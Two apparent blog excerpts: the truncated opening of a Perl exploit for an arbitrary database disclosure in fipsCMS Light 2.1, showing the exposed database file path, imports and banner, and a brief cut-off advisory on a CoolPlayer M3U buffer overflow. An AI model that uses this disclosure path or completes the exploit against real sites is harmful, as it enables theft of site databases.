I wrote this a long time ago and thought post here.Link to packetstormsecurity #!/usr/bin/perl # # fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit # # Exploit by d3b4g # script:http://fipsasp.com # Demo: http://demo.fipsasp.com/fipsCMS_light/_fipsdb/db.mdb # From Tiny little island of maldivies use LWP::Simple; use LWP::UserAgent; print “\fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit\n”; print “\t****************************************************************\n”; print [...]

Class: Boundary Condition Error CVE: CVE-2009-1437 Remote: Yes Local: No Published: Sep 29 2009 Credit: d3b4g Bugtraq ID: 30418 CoolPlayer is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. The issue occurs when handling specially crafted M3U files. Successfully exploiting this issue allows remote attackers to execute [...]